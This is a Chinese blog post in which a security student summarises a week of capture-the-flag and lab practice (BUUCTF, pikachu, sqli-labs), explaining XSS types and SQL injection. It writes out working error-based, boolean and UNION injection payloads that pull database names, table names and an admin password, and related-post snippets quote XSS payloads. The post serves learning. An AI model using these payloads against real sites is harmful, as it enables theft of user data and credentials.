第十四周总结

已于 2022-05-21 14:59:37 修改
阅读量310 收藏
点赞数
文章标签: 安全
于 2022-05-21 14:41:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/124896326
版权

buuctf 随便注

sqli 01

sqli 02

sqli 03

sqli 05

sqli 06

pikachu csrf(get)

pikachu 数字型注入

pikachu 字符型注入

pikachu 搜索型

pikachu xx型注入

pikachu (基于报错分析)

简单检测sql注入点

pikachu xss(get)

pikachu SQL注入(insert)

pikachu SQL注入(delete)

pikachu SQL注入(http header)

pikachu(bool盲注)

pikachu(时间盲注)

sqli暴力破解

pikachu(RCE)

pikachu 文件包含

BUUCTF LOVESQL

XSS靶场通关

buuctf (buyflag)

buuctf 萌萌哒八戒

本周总结:

xss

XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS即存储型XSS,非常危险,容易造成蠕虫,大量盗窃cookie。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。

一些基本检测:<>"'script onclick    检测尖括号,单引号和双引号有没有被过滤

SQL

sql是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入

updatexml()

zrtonnn' and updatexml(1,concat(0x7e,version()),0)#   

zrtonnn' and updatexml(1,concat(0x7e,database()),0)# 可以用来查询数据库

0x7e是~ version()版本,可以用来查询版本 #用来注释掉后面的内容

#报错只能一次显示一行

zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#

可以使用limit一次一次进行获取表名

zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#

如果我们想要得到第二个表名呢

zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 1,1)),0)#

将limit后面的修改为1即可得到第二个表名

获取到表名后,在获取列名,思路是一样的

zrtonnn' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='pikachu' limit 0,1)),0)#

获取到列名后,再来获取数据:

zrtonnn' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)# //获取密码

zrtonnn' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)# //获取用户名

判断SQL注入是否存在注入点,我们可以通过构造payload,多次尝试,看看是否能够遍历数据库

例如:

anyouzhen" or 1=1# (猜测后端代码为双引号)

anyouzhen' or 1=1#(猜测后端代码为单引号)

anyouzhen' and 1=1# 恒为真,与单独输入anyouzhen效果一样

anyouzhen ' and 1=2# 如果返回值为空,说明这玩意确实被带入到数据库中进行拼接了,存在sql注入漏洞

也可以输入特殊字符,例如输入:'    看看会不会报错,如果报错,说明代入到数据库中去了

GET 注入

提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。

POST 注入

使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。

HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。

HTTP 头部注入

注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话,Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候,Cookie 是头部的一个字段

联合查询

$id =1 UNION ALL SELECT creditCardNumber,1,1 FROM Table

ANYOUZHEN
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第十四会议记录表1
08-03
1. 讨论决定本准备工作及分配 1. 任务及分配: 1. 准备实验六的分析工作(刘颖) 2. 完成实验七的数据采集和分析总结(李铎坤) 3. 准备产品展示方案
成为数据分析师第2:业务
最新发布
10-09
总结,第二的“业务”主题涵盖了数据分析师如何融入业务场景,使用数据解决实际问题,促进企业的战略决策和业务优化。通过深入学习和实践这些知识点,你将在数据分析师的道路上迈出了坚实的步伐。
BUUCTF basic PikaChu & AWD-Test1 & Webug 4.0
网安小趴菜
09-03 1865
BUUCTF basic PikaChu & AWD-Test1 & Webug 4.0
Pikachu 练习笔记(暴力破解)
抒情诗
05-15 576
在buu开了个皮卡丘,准备有空练习练习,抽空吧 Burte Force(暴力破解)概述 “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程 就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会 使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个 系统是否存在暴力破解漏洞,其条件也不是绝对的。
2021-11-09 SQL注入---联合注入
夕阳的街道的博客
11-09 2112
aaa
【web-ctf】ctf-pikachu-暴力破解
一个努力生活的人的博客
06-11 2822
文章目录暴力破解(Brute Force)1.基于表单的暴力破解 burpsuite配置 火狐浏览器需要导入证书 如果无法抓到127.0.0.1的包,可以试试以下操作 暴力破解(Brute Force) 1.基于表单的暴力破解 使用burpsuite工具中的intruder模块进行暴力破解:intruder模块使用教程 先随便输入一个username和password 利用burpsuite进行抓包 将抓到的包导入intruder模块(在空白处右键,选择send to intruder)
ctf笔记(pikachu) 19.8.27-19.9.14
dingpang8200的博客
09-04 798
本期笔记以pikachu漏洞平台为主 XSS过htmlspecialchars' oninput=alert`1` //' oninput=alert`1` '' onchange=alert`1` //' onchange=alert`1` ' DOM型XSS闭合掉语句,然后构造攻击语句例:'><img src="1" onerror="alert('xss')"&gt...
《信息安全系统设计基础》第十四学习总结.docx
12-27
《信息安全系统设计基础》第十四的学习主要涵盖了客户端-服务器编程模型、网络基础知识、互联网协议以及TCP/IP协议栈的相关知识。以下是对这些知识点的详细解释: 客户端-服务器模型是网络应用的基础架构,其中...
二年级数学第十四教案.docx
10-02
这篇文档是关于二年级数学课程的教学计划,主要涵盖了第六单元的表内乘法,特别是7的乘法口诀。在教学目标中,强调了学生需要理解7的乘法口诀的来源和意义,并能运用口诀正确计算。此外,教学内容还包括了让学生建立...
2011年南兴渠完全小学第十四届推普活动总结
11-03
2011年南兴渠完全小学第十四届推普活动总结2011年南兴渠完全小学第十四届推普活动总结2011年南兴渠完全小学第十四届推普活动总结
Pikachu-暴力破解
baynk的博客
11-17 1987
0x00 Burte Force(暴力破解)概述 “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏...
pikachu漏洞平台靶场练习 总结 wp
Alexhirchi的博客
07-30 3640
每日学习 每日持续更新ing~ 之前一直都是在CTF刷题,感觉平常还是要打打靶场,学习一下实战环境啊~ 文章目录pikachu靶场Burt Force 暴力破解基于表单的暴力破解验证码绕过(on server)验证码绕过(on client)token防爆破?XSS(跨站脚本漏洞)CSRF(跨站请求伪造) pikachu靶场 Burt Force 暴力破解 关键点:连续性+自动化+字典 测试流程: (1)确认暴力破解的"可能性" (2)对字典的优化(根据注册要求去掉不必要的密码,验证存在的管理员账号直接.
BUUCTF】MISC 弱口令 超详细——附:Python 怎么安装库、模块、包最最方便!!!
algae
05-08 5457
弱口令 1 老菜鸡,伤了神,别灰心,莫放弃,试试弱口令 注意:得到的 flag 请包上 flag{} 提交
BUUCTF__[极客大挑战 2019]Knife_题解
风过江南乱的博客
05-22 1909
前言 想做前面那题高明的黑客,可是没学过python不会写脚本。。。而且看wp也感觉脚本也挺复杂的,以后再说吧,看来是得赶紧学习python了。 再说这题,从打开到拿到 flag ,可能还没有一分钟,着实简单。哈哈哈,可能这就是秒题吧。 看题 一看就是要用shell 连接了 F12 也没有什么提示。但发现说白给的shell。 白给,怎么白给,在哪???白嫖一下 但想想 shell 肯定肯定是PHP文件了。而一般网站都会有 index.php 所以尝试一下用蚁剑连接 index.
BUUCTF-Basic
5L2g556F5ZWl77yf
11-08 2779
文章目录BasicLinux LabsBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1BUU SQL COURSE 1sqli-labsBUU UPLOAD COURSE 1BUU BURP COURSE 1BUU XSS COURSE 1 Basic Linux Labs ssh连接/目录下 BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao
BUUCTF misc 面具下的flag
hhh
10-02 4755
给了一个.jpg的图片,用winhex打开后发现文件的结尾并不是FF D9 紧接着后面是50 4B 03 04,是.zip文件的文件头,有伪加密,修改后成功解压,得到一个flag.vmdk虚拟机磁盘文件。 然后……我以为是内存取证题目呢(菜 然后用volatility分析了半天连个操作系统信息都分析不出来(泪 后来百度了题解(颓 用7z解压缩后得到了很多个文件夹, 其中key_...
BUUCTF:[CISCN2019 华东北赛区]Web2
末初的CSDN博客
03-31 2613
BUUCTF:[CISCN2019 华东北赛区]Web2 参考:https://blog.csdn.net/weixin_44677409/article/details/100741998 经测试发现存在以下页面: index.php admin.php login.php register.php post.php commitbug.php about.php admin.php没有权限...
pikachu漏洞练习平台之文件包含
m0_55854679的博客
06-23 304
File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once(), require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量
BUUCTF:[极客大挑战 2019]RCE ME
末初的CSDN博客
03-27 8432
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法 绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编码绕过 PS C:\Users\Administrator> php -r "echo urlencode(~'phpinfo');" ...
防火墙运维 16的详细实习任务与计划
06-10
第十一第十四:参与公司的网络安全评估和审计,学习如何进行安全评估和漏洞扫描,提高安全评估能力。 第十五至第十六总结实习过程中所学习到的知识和技能,撰写实习报告并进行汇报。 以上仅是一个大致...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值